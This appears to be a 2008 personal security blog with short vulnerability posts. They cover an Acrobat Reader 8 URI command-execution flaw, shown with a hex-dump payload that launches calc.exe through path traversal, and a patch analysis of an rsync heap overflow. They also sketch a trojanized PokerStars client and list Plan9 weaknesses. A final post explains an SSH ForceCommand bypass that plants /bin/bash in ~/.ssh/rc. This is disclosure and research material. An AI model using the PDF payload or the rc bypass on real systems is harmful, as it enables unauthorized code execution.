jueves, abril 24, 2008

Interesting "feature" of AcroRead

Acroread8 is vulnerable to a command execution, is possible at URI tag, to make a local path to the file you want to be executed.
get the exploit
This exploit executes the windows calculator, but it can be modified easily:

00000f30 20 6f 62 6a 0d 3c 3c 2f 55 52 49 28 6d 61 69 6c | obj.<</URI(mail|
00000f40 74 6f 3a 74 65 73 74 25 2e 2e 2f 2e 2e 2f 2e 2e |to:test%../../..|
00000f50 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f |/../../../../../|
00000f60 77 69 6e 64 6f 77 73 2f 73 79 73 74 65 6d 33 32 |windows/system32|
00000f70 2f 63 61 6c 63 2e 65 78 65 22 2e 63 6d 64 29 2f |/calc.exe".cmd)/|

Conclusion: don't trust in any file given from unknown people :)

lunes, abril 14, 2008

Rsync remote code execution

Rync service with xattr support is vulnerable to a remote code execution in versions between 2.6.9 and 3.0.1
--- a/util.c
+++ b/util.c
@@ -1329,7 +1329,7 @@ void *_new_array(unsigned long num, unsigned int size, int use_calloc)
  return use_calloc ? calloc(num, size) : malloc(num * size);
-void *_realloc_array(void *ptr, unsigned int size, unsigned long num)
+void *_realloc_array(void *ptr, unsigned int size, size_t num)
  if (num >= MALLOC_MAX/size)
   return NULL;
@@ -1550,7 +1550,10 @@ void *expand_item_list(item_list *lp, size_t item_size,
    new_size += incr;
    new_size *= 2;
-  new_ptr = realloc_array(lp->items, char, new_size * item_size);
+  if (new_size < lp->malloced)
+   overflow_exit("expand_item_list");
+  /* Using _realloc_array() lets us pass the size, not a type. */
+  new_ptr = _realloc_array(lp->items, item_size, new_size);
   if (verbose >= 4) {
    rprintf(FINFO, "[%s] expand %s to %.0f bytes, did%s move\n",
     who_am_i(), desc, (double)new_size * item_size,

1. size_t

First there is the check if (num >= MALLOC_MAX/size)
num*size has to be less than MALLOC_MAX

Have this check a sign problem?

rsync.h redefines size_t to unsigned int, there is not problem, and xattr patch doesn't change this to a signed one.

There is not sign problem here.

2. new_size < malloced

+ if (new_size < lp->malloced)
Now is not possible use this realloc to reduce the heap variable lp->items!!!

3. supply the fixed size instead of the type char

char should *1 I dont think this was a problem.

- new_ptr = realloc_array(lp->items, char, new_size * item_size);
+ new_ptr = _realloc_array(lp->items, item_size, new_size);

The first will use a macro to do:
_realloc_array (ptr, sizeof(char), new_size*item_size)

rsync.h:#define realloc_array(ptr, type, num) ((type*)_realloc_array((ptr), sizeof(type), (num)))

The second will realloc item_size*new_size

The Problem

Then, the problem seems the reduction of size, that was not controlled and lets overflow the lp->items array.

The Explotation

More details about explotation, soon.

jueves, abril 10, 2008

PokerStars Security

In this video we can see that the code is making a tcp connection to The SSL crypted connection to 445 can be redirected to my sha0proxy.pl

PokerStars communication is secure bescause they check the certificates.

If we patch the call dword ptr DS:[7145C] (connect) to make our fake connection to the evilserver, it will not work because of the certificates validations. But cards can be sended to the evil-host. The trojanized client can be distributed to the users.

Conclusion: The software always must be downloaded from an official font by a clear url.

miércoles, abril 09, 2008

Plan9 Security

Plan9 is a new concept of operative system, I like it but I am not confident about its security.

- It saves all the passwords used to connect to remote services in the cache

- There are grids open, maybe are vulnerable a some kind of worms, or can be use as DDoS platforms.

- When you introduce the password to log-in to remote file-server, is viewed in plaint-ext at the screen.

- plan9 services are vulnerable to a stack attacks.

plan9 Security
plan9 Shellcode
plan9 scheduler
pegassus, plan9 webserver
acid, plan9 debugger

I have recorded a video introducing the acid debugger usage.

lunes, abril 07, 2008

SSH ForceCommand security flaw

ForceCommand is a sshd_config option that lets use the remote ssh to execute a restricted commands, for example vi somefile.

When a SSH session is started the ~/.ssh/rc shell script is executed, the user logged by ssh, has permissions to write into his own rc.

Then if we are allowed to make a vi somefile, we can write into ~/.ssh/rc and write a /bin/bash that will be spawned the next time we enter to the system.

The patch only lets the rc execution when ForceCommand is not enabled (options.adm_forced_command == NULL)

+++ usr.bin/ssh/session.c 27 Mar 2008 10:54:55 -0000
@@ -878,8 +878,9 @@
do_xauth =
s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;

- /* ignore _PATH_SSH_USER_RC for subsystems */
- if (!s->is_subsystem && (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
+ /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */
+ if (!s->is_subsystem && options.adm_forced_command == NULL &&
+ (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
snprintf(cmd, sizeof cmd, "%s -c '%s %s'",
if (debug_flag)